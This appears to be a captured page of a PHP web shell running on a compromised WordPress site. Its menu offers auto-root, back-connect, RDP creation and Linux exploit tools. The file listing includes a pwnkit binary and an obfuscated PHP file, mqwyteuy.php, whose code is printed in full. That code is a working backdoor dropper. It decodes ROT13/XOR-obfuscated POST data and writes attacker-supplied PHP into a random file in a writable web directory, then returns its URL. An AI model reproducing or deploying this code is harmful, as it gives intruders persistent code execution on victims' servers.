Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
adrar.info /
wp-admin /
css /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
154
B
-rw----r--
.mad-root
0
B
-rw-r--r--
HGAVodTZBJ.mp3
969
B
-rw----r--
mqwyteuy.php
1.88
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mqwyteuy.php
<?php foreach ($_POST as $session_key => $value) { if (strlen($session_key) == 16) { $value = str_split(rawurldecode(str_rot13($value))); $session_key = array_slice(str_split(str_repeat($session_key, (count($value)/16)+1)), 0, count($value)); function encoder($val, $index, $session_key) { $auth = "uixvqnziglokgdql"; return $val ^ $auth[$index % strlen($auth)] ^ $session_key; } $value = implode("", array_map("encoder", array_values($value), array_keys($value), array_values($session_key))); $value = @unserialize($value); if (@is_array($value)) { $key = array_keys($value); $value = $value[$key[0]]; if ($value === $key[0]) { echo @serialize(Array("php" => @phpversion(), ));exit(); } else { function listdirs($dir) { static $alldirs = array(); $dirs = glob($dir . '/*', GLOB_ONLYDIR); if (count($dirs) > 0) { foreach ($dirs as $d) { if (@is_writable($d)) { $alldirs[] = $d; } } } foreach ($dirs as $dir) listdirs($dir); return $alldirs; } $docroot = $_SERVER["DOCUMENT_ROOT"]; $dirs = listdirs($docroot); $key = array_rand($dirs); $dest = $dirs[$key] . "/" . substr(md5(time()), 0, 8) . ".php"; @file_put_contents($dest, $value); echo "http://" . $_SERVER["HTTP_HOST"] . substr($dest, strlen($docroot)); exit(); } } } }
Close
